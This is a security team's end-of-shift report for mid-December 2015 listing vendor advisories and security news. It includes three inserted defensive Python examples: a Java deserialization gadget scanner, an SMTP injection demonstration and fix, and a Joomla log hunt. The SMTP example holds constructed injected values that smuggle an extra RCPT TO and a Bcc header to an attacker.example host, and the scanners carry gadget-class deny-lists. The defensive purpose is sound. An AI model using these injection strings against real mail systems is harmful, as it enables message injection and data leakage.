End-of-Shift report
Timeframe: Friday 11-12-2015 18:00 - Monday 14-12-2015 18:00
Handler: Stephan Richter
Co-Handler: Alexander Riepl
IBM Security Bulletin
Vulnerability in Apache Commons affects WebSphere Message Broker and IBM Integration Bus (CVE-2015-7450)
http://www.ibm.com/support/docview.wss?uid=swg21972391
***Vulnerability in Apache Commons affects Tivoli Network Manager Transmission Edition (CVE-2015-7450)
http://www.ibm.com/support/docview.wss?uid=swg21971891
***Vulnerability in Apache Commons affects Rational Developer for System z (CVE-2015-7450)
http://www.ibm.com/support/docview.wss?uid=swg21971643
***Vulnerability in the IBM Installation Manager script (CVE-2015-7442)
http://www.ibm.com/support/docview.wss?uid=swg21971295
***Vulnerability in Apache Commons affects Rational Software Architect, Rational Software Architect for WebSphere Software and Rational Software Architect RealTime (CVE-2015-7450)
http://www.ibm.com/support/docview.wss?uid=swg21972753
***Vulnerabilities in OpenSSL affect IBM Rational Application Developer for WebSphere Software (CVE-2015-3193, CVE-2015-3194, CVE-2015-3195, CVE-2015-3196, CVE-2015-1794)
http://www.ibm.com/support/docview.wss?uid=swg21972951
***A security vulnerability has been identified in IBM Maximo Asset Management which could allow an attacker to obtain sensitive information via REST API (CVE-2015-7452)
http://www.ibm.com/support/docview.wss?uid=swg21972463
***IBM Maximo Asset Management is vulnerable to cross-site scripting, caused by improper validation of user-supplied input (CVE-2015-7451)
http://www.ibm.com/support/docview.wss?uid=swg21972423
***IBM Security Network Intrusion Prevention System is affected by krb5 vulnerabilities (CVE-2014-4341, CVE-2013-1418)
http://www.ibm.com/support/docview.wss?uid=swg21970321
***A vulnerability in OpenSSH affects IBM Security Network Intrusion Prevention System (CVE-2015-5600)
http://www.ibm.com/support/docview.wss?uid=swg21969673
***A vulnerability in net-snmp affects IBM Security Network Intrusion Prevention System (CVE-2014-3565)
http://www.ibm.com/support/docview.wss?uid=swg21972208
***Vulnerabilities in curl affect IBM Security Network Intrusion Prevention System
http://www.ibm.com/support/docview.wss?uid=swg21968978
***A security vulnerability has been identified in IBM Rational ClearQuest (CVE-2015-4996)
http://www.ibm.com/support/docview.wss?uid=swg21972331
***Multiple vulnerabilities in IBM Java Runtime affect IBM Tivoli Provisioning Manager (CVE-2015-2601, CVE-2015-1931, CVE-2015-2625)
http://www.ibm.com/support/docview.wss?uid=swg21972941
***Vulnerabilities in OpenSSL affect IBM Cognos Planning (CVE-2015-1789, CVE-2015-1790, CVE-2015-1792)
http://www.ibm.com/support/docview.wss?uid=swg21971729
Website Malware - Evolution of Pseudo Darkleech
Last March we described a WordPress attack that was responsible for hidden iframe injections that resembled Darkleech injections: declarations of styles with random names and coordinates, iframes with No-IP host names, and random dimensions where the ..
https://blog.sucuri.net/2015/12/evolution-of-pseudo-darkleech.html
iTunes 12.3.2
https://support.apple.com/kb/HT205636
Security Advisory: Apache Groovy vulnerability CVE-2015-3253
The MethodClosure class in runtime/MethodClosure.java in Apache Groovy 1.7.0 through 2.4.3 allows remote attackers to execute arbitrary code or cause a denial of service via a crafted serialized object. (CVE-2015-3253)
https://support.f5.com:443/kb/en-us/solutions/public/k/49/sol49233165.html
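The Apache Commons Collections bulletins above (CVE-2015-7450) and this Groovy advisory describe the same mechanism: an untrusted Java serialization stream names a class whose deserialization side effects execute attacker-chosen code. The following is an added example, not code from the page, F5 or IBM: a Python triage helper that recognises a Java serialization stream (raw or base64-encoded), pulls the class names out of its class descriptors and flags known gadget classes. The sample streams are constructed inside the script; the deny-list and the byte-level heuristic are assumptions of this example, and on the Java side a look-ahead ObjectInputStream that refuses unexpected classes remains the durable fix.

```python
from __future__ import annotations

import base64
import re

# Java serialization stream header: STREAM_MAGIC 0xACED followed by STREAM_VERSION 5.
JAVA_STREAM_MAGIC = b"\xac\xed\x00\x05"
# Those four bytes base64-encode to a string that always starts with this prefix,
# which is how the same stream looks inside a cookie or a form parameter.
JAVA_STREAM_MAGIC_B64 = b"rO0AB"

# Class names from the gadget chains behind the bulletins above: the Commons
# Collections transformer (CVE-2015-7450) and the Groovy MethodClosure
# (CVE-2015-3253). This deny-list is a starting point (an assumption of the
# example), not an exhaustive inventory; extend it per environment.
SUSPICIOUS_CLASSES = {
    "org.apache.commons.collections.functors.InvokerTransformer",
    "org.apache.commons.collections4.functors.InvokerTransformer",
    "org.codehaus.groovy.runtime.MethodClosure",
}

# A Java class name as written into a stream descriptor (ASCII letters, digits,
# dots, '$', and array prefixes such as "[L...;").
_CLASSNAME_RE = re.compile(rb"[A-Za-z0-9_.$;\[]+")


def normalize(blob: bytes) -> bytes:
    """Return the raw stream bytes, base64-decoding the blob when it carries one."""
    text = blob.strip()
    if text.startswith(JAVA_STREAM_MAGIC_B64):
        return base64.b64decode(text + b"=" * (-len(text) % 4))
    return blob


def extract_class_names(stream: bytes) -> list[str]:
    """Heuristically pull class names out of TC_CLASSDESC (0x72) records.

    Each descriptor starts with 0x72, a 2-byte big-endian length and the class
    name in (modified) UTF-8. This is a byte scan, not a parser of the whole
    stream grammar, so it also works on truncated or partially captured streams.
    """
    names: list[str] = []
    i = 0
    while (i := stream.find(b"\x72", i)) != -1:
        length = int.from_bytes(stream[i + 1:i + 3], "big")
        candidate = stream[i + 3:i + 3 + length]
        if 0 < length == len(candidate) and _CLASSNAME_RE.fullmatch(candidate):
            names.append(candidate.decode("ascii"))
            i += 3 + length  # skip the name so its own 'r' bytes are not re-scanned
        else:
            i += 1           # a stray 0x72 byte; keep looking
    return names


def inspect_java_stream(blob: bytes) -> dict:
    """Classify an untrusted blob: is it a Java stream, and which classes does it name?"""
    raw = normalize(blob)
    is_stream = raw.startswith(JAVA_STREAM_MAGIC)
    classes = extract_class_names(raw) if is_stream else []
    return {
        "is_java_stream": is_stream,
        "classes": classes,
        "suspicious": sorted(c for c in classes if c in SUSPICIOUS_CLASSES),
    }


# --- constructed sample streams (not real captures) --------------------------
def _classdesc(name: str) -> bytes:
    """TC_CLASSDESC + length + name, followed by a zeroed 8-byte serialVersionUID
    placeholder; the remaining descriptor fields are omitted in this sample."""
    return b"\x72" + len(name).to_bytes(2, "big") + name.encode("ascii") + b"\x00" * 8


SAMPLE_BENIGN = JAVA_STREAM_MAGIC + b"\x73" + _classdesc("java.util.HashMap")
SAMPLE_GADGET = (JAVA_STREAM_MAGIC + b"\x73" + _classdesc("java.util.HashMap")
                 + _classdesc("org.codehaus.groovy.runtime.MethodClosure"))
SAMPLE_GADGET_B64 = base64.b64encode(SAMPLE_GADGET)

if __name__ == "__main__":
    for label, blob in [("benign", SAMPLE_BENIGN), ("gadget", SAMPLE_GADGET),
                        ("gadget-b64", SAMPLE_GADGET_B64)]:
        print(label, inspect_java_stream(blob))
```

Run it against request bodies, cookies or JMX/RMI captures from the affected products; a hit on the deny-list means the stream is worth blocking and the source worth investigating, while a clean class list only says the scan found nothing it knows about.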
Security Update 2015-006 Yosemite
https://support.apple.com/kb/HT205653
OS X El Capitan 10.11.2, Security Update 2015-005 Yosemite, and Security Update 2015-008 Mavericks
https://support.apple.com/kb/HT205637
OS X El Capitan 10.11.1, Security Update 2015-004 Yosemite, and Security Update 2015-007 Mavericks
https://support.apple.com/kb/HT205375
What Signs Are You Missing?
While recently listening to a presentation, I found my attention drawn to a metal water container at the center of the conference room table. Condensation was all around it and without ever having to interact with the container, I found ..
https://isc.sans.edu/diary.html?storyid=20481
Google Bans Symantec Root Certificates
An anonymous reader writes: After Google discovered in September SSL certificates issued in its name by Symantec, and after the company discovered in October over 2,500 ..
http://tech.slashdot.org/story/15/12/12/2255212/google-bans-symantec-root-certificates
DSA-3416 libphp-phpmailer - security update
Takeshi Terada discovered a vulnerability in PHPMailer, a PHP library for email transfer, used by many CMSs. The library accepted email addresses and SMTP commands containing line breaks, which can be abused by an attacker to inject messages.
https://www.debian.org/security/2015/dsa-3416
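Added example, not from the Debian advisory or PHPMailer: the injection the DSA describes, reproduced and then blocked in Python. A recipient address containing CR LF turns a single RCPT TO into two SMTP commands; the fixed builders refuse any address or header value carrying a line break or NUL. The mailbox regex, the header builder and the attacker inputs are constructed for this illustration.

```python
import re

# A deliberately narrow mailbox shape: one local part, one '@', a dotted host.
# It admits no whitespace and no control characters at all (assumption of this example).
_MAILBOX_RE = re.compile(r"^[A-Za-z0-9._%+-]+@[A-Za-z0-9-]+(?:\.[A-Za-z0-9-]+)+$")


def build_rcpt_vulnerable(addr: str) -> str:
    """The flawed pattern: the address is dropped into the SMTP command unchecked."""
    return f"RCPT TO:<{addr}>\r\n"


def build_rcpt_fixed(addr: str) -> str:
    """Refuse anything that could terminate the command line early."""
    if any(ch in addr for ch in ("\r", "\n", "\0")):
        raise ValueError("address contains a line break or NUL")
    if not _MAILBOX_RE.match(addr):
        raise ValueError("address is not a plain mailbox")
    return f"RCPT TO:<{addr}>\r\n"


def build_header_fixed(name: str, value: str) -> str:
    """Same rule for message headers: a value with CR or LF would start a new header."""
    if "\r" in value or "\n" in value:
        raise ValueError(f"{name} header value contains a line break")
    return f"{name}: {value}\r\n"


def smtp_commands(wire: str) -> list:
    """Split the bytes the way a server reads them: one command per terminated line.
    A bare LF is split on as well, because many servers accept it as a terminator."""
    return [line for line in re.split(r"\r\n|\n", wire) if line]


def rejects(fn, *args) -> bool:
    """True when the builder refuses the input with ValueError."""
    try:
        fn(*args)
    except ValueError:
        return True
    return False


# Constructed attacker input: the recipient closes its own angle bracket,
# then injects a second RCPT TO command.
INJECTED_ADDR = "victim@example.com>\r\nRCPT TO:<second@attacker.example"
# Constructed header injection: a subject that sprouts a Bcc header.
INJECTED_SUBJECT = "Invoice\r\nBcc: leak@attacker.example"

if __name__ == "__main__":
    print(smtp_commands(build_rcpt_vulnerable(INJECTED_ADDR)))
    print("fixed rejects address:", rejects(build_rcpt_fixed, INJECTED_ADDR))
    print("fixed rejects subject:", rejects(build_header_fixed, "Subject", INJECTED_SUBJECT))
```

The same check belongs wherever user input reaches a line-oriented protocol: reject CR, LF and NUL outright rather than trying to strip them, since stripping changes the value silently and a later encoding step may reintroduce a terminator.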
Memory-resident modular malware menaces moneymen
Latentbot avoids your HDD - and it's been off the radar for two years. A stealthy strain of malware resident only in memory has been quietly pwning victims around the world for two years.
www.theregister.co.uk/2015/12/14/latentbot_memory_resident_malware/
Lenovo/CSR: Bluetooth driver installs root certificates
A Bluetooth driver for chips made by CSR installs two root certificates with which the holder of the private key could attack HTTPS connections. Apparently these are test certificates used for driver signing during development.
http://www.golem.de/news/lenovo-csr-bluetooth-treiber-installiert-root-zertifikat-1512-117996.html
Inside the German cybercriminal underground
Trend Micro investigated German crime forums and concluded that Germany possesses the most advanced cybercrime ecosystem in the European Union. We have reported several times the news related to various criminal cybercriminal ..
http://securityaffairs.co/wordpress/42802/cyber-crime/german-cybercriminal-underground.html
[20151214] - Core - Remote Code Execution Vulnerability
Browser information is not filtered properly while saving the session values into the database, which leads to a Remote Code Execution vulnerability.
https://developer.joomla.org/security-centre/630-20151214-core-remote-code-execution-vulnerability.html
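Added example, not from the Joomla advisory: a small hunt over web server access logs for the kind of input this bug accepts. The advisory only says "browser information", so the script assumes the User-Agent header is the carrier and looks for PHP serialized-object syntax (O:<length>:"<class>":<count>:{ ...) or control bytes in it. The log lines are constructed, the length threshold is an assumption, and a hit is a lead for checking the session table, not proof of exploitation.

```python
import re

# Apache/nginx "combined" log format. The User-Agent is the last quoted field;
# both servers write a literal '"' inside it as \" and non-printable bytes as \xHH.
_COMBINED_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" (?P<status>\d{3}) (?P<size>\S+) '
    r'"(?P<ref>[^"]*)" "(?P<ua>(?:[^"\\]|\\.)*)"'
)
# PHP serialized-object syntax: O:<len>:"<class>":<fields>:{ ... }
_PHP_OBJECT_RE = re.compile(r'O:\d+:"[A-Za-z0-9_\\]+":\d+:\{')
_LOG_ESCAPE_RE = re.compile(r'\\x[0-9a-fA-F]{2}|\\.')
MAX_UA_LEN = 512  # assumed threshold; tune to your own traffic


def _unescape_log(field: str) -> str:
    """Undo the log writer's escaping so we inspect what the client actually sent."""
    def repl(m):
        tok = m.group(0)
        if tok.startswith("\\x"):
            return chr(int(tok[2:], 16))
        return tok[1]  # \" -> " and \\ -> \
    return _LOG_ESCAPE_RE.sub(repl, field)


def parse_combined(line: str):
    """Return the fields of one combined-format line, or None if it does not parse."""
    m = _COMBINED_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ua"] = _unescape_log(rec["ua"])
    return rec


def ua_findings(ua: str) -> list:
    """Reasons a User-Agent value deserves a second look."""
    findings = []
    if _PHP_OBJECT_RE.search(ua):
        findings.append("php-serialized-object")
    if any(not 0x20 <= ord(ch) <= 0x7e for ch in ua):
        findings.append("non-printable")
    if len(ua) > MAX_UA_LEN:
        findings.append("oversized")
    return findings


def hunt(lines) -> list:
    """Return (client ip, user-agent, findings) for every line worth a second look."""
    hits = []
    for line in lines:
        rec = parse_combined(line)
        if rec is None:
            continue
        findings = ua_findings(rec["ua"])
        if findings:
            hits.append((rec["ip"], rec["ua"], findings))
    return hits


# Constructed sample log lines (not real traffic): the second carries a
# serialized PHP object in the User-Agent, the third carries control bytes.
SAMPLE_LOG = [
    r'203.0.113.5 - - [14/Dec/2015:10:01:22 +0100] "GET /index.php HTTP/1.1" 200 5123 "-" '
    r'"Mozilla/5.0 (X11; Linux x86_64) Firefox/42.0"',
    r'198.51.100.7 - - [14/Dec/2015:10:02:03 +0100] "GET /index.php HTTP/1.1" 200 5123 "-" '
    r'"O:8:\"stdClass\":1:{s:1:\"x\";s:1:\"y\";}"',
    r'198.51.100.9 - - [14/Dec/2015:10:02:41 +0100] "GET /index.php HTTP/1.1" 200 5123 "-" '
    r'"Mozilla/4.0 (compatible)\x00\x01"',
]

if __name__ == "__main__":
    for ip, ua, findings in hunt(SAMPLE_LOG):
        print(ip, findings, repr(ua))
```

Feed it the access logs from the window before the patch was applied; for any hit, compare the client IP and timestamp against the session table rows from the same period.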
[20151214] - Core - CSRF Hardening
Add additional CSRF hardening in com_templates.
https://developer.joomla.org/security-centre/633-20151214-core-csrf-hardening.html
[20151214] - Core - Directory Traversal
Fails to properly sanitise input data from the XML install file located within the package archive.
https://developer.joomla.org/security-centre/634-20151214-core-directory-traversal.html
Bugtraq: ERPSCAN Research Advisory [ERPSCAN-15-022] SAP NetWeaver 7.4 - XSS
http://www.securityfocus.com/archive/1/537111
Bugtraq: [ERPSCAN-15-021] SAP NetWeaver 7.4 - SQL Injection vulnerability
http://www.securityfocus.com/archive/1/537109
Security researcher: data leak at MacKeeper allows open access to user data
The database of the controversial Mac software MacKeeper is freely accessible, a security researcher reports. He says he downloaded 13 million records of user information unhindered.
http://heise.de/-3043720